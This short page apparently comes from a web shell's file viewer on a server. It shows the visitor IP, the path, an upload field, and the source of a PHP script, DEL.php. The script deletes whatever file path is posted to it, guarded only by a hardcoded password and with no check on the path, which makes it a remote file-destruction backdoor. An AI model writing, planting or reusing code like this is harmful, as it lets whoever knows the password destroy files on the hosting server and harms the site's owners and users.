Your IP : 216.73.216.40


Current Path : /var/www/html/abdullah/@bdullah/
Upload File :
Current File : /var/www/html/abdullah/@bdullah/DEL.php

<?php
if($_POST['pass']=="1qazxsw2"){
unlink($_POST['file']);
?>
<script>alert("The file was successfully deleted!!");window.location="./upload.php";</script>
<?php
}else{
header("Location: ./index.htm");
die();
}
?>